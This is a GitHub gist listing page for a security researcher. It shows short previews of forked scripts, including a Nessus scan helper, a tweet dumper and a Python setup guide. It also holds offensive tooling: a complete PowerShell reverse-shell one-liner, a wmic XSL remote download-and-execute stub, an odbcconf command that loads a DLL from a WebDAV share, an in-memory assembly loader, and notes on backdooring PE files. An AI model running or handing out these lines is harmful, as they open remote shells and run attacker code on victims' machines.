
Paul PaulSec

@PaulSec
PaulSec / cloudscan.py
Created January 4, 2017 14:06 — forked from jgamblin/cloudscan.py
A python script to run Nessus cloud scans by @jgamblin but mostly stolen from @averagesecguy.
#!/usr/bin/env python
# Name: cloudscan.py
# Purpose: Run Nessus Cloud Scans Easily.
# By: Jerry Gamblin
# Date: 11.05.15
# Modified 11.05.15
# Rev Level 0.5
# -----------------------------------------------
import requests
@PaulSec
PaulSec / all.txt
Created July 16, 2017 15:33 — forked from jhaddix/all.txt
dnsall
This file has been truncated, but you can view the full file.
@PaulSec
PaulSec / tweet_dumper.py
Created October 16, 2017 07:21 — forked from yanofsky/LICENSE
A script to download all of a user's tweets into a csv
#!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""
@PaulSec
PaulSec / powershell_reverse_shell.ps1
Created October 30, 2018 13:20 — forked from ThunderSon/powershell_reverse_shell.ps1
powershell reverse shell one-liner (no attribution)
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@PaulSec
PaulSec / msfvenom-reverse-tcp-WaitForSingleObject.md
Created December 29, 2018 11:45 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for the WaitForSingleObject call within a modern msfvenom-generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment and WaitForSingleObject locating and patching. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.

Contents:

@PaulSec
PaulSec / python_environment_setup.md
Created February 6, 2019 15:43 — forked from wronk/python_environment_setup.md
Setting up your python development environment (with pyenv, virtualenv, and virtualenvwrapper)

Overview

When you're working on multiple coding projects, you might want a couple of different versions of Python and/or modules installed. That way you can keep each project in its own sandbox instead of trying to juggle multiple projects (each with different dependencies) on your system's version of Python. This intermediate guide covers one way to handle multiple Python versions and Python environments on your own (i.e., without a package manager like conda). See the Using the workflow section to view the end result.

Use cases

  1. Working on 2+ projects that each have their own dependencies; e.g., a Python 2.7 project and a Python 3.6 project, or developing a module that needs to work across multiple versions of Python. It's not reasonable to uninstall/reinstall modules every time you want to switch environments.
  2. If you want to execute code on the cloud, you can set up a Python environment that mirrors the relevant
@PaulSec
PaulSec / TestAssembly.cs
Created May 21, 2019 12:18 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@PaulSec
PaulSec / wmic.xsl
Created May 21, 2019 12:19 — forked from Arno0x/wmic.xsl
Oneliner for arbitrary code download and execution
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
@PaulSec
PaulSec / odbcconf.cs
Created May 21, 2019 12:19 — forked from Arno0x/odbcconf.cs
Download and execute arbitrary code with odbcconf.exe
/*
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/
using System;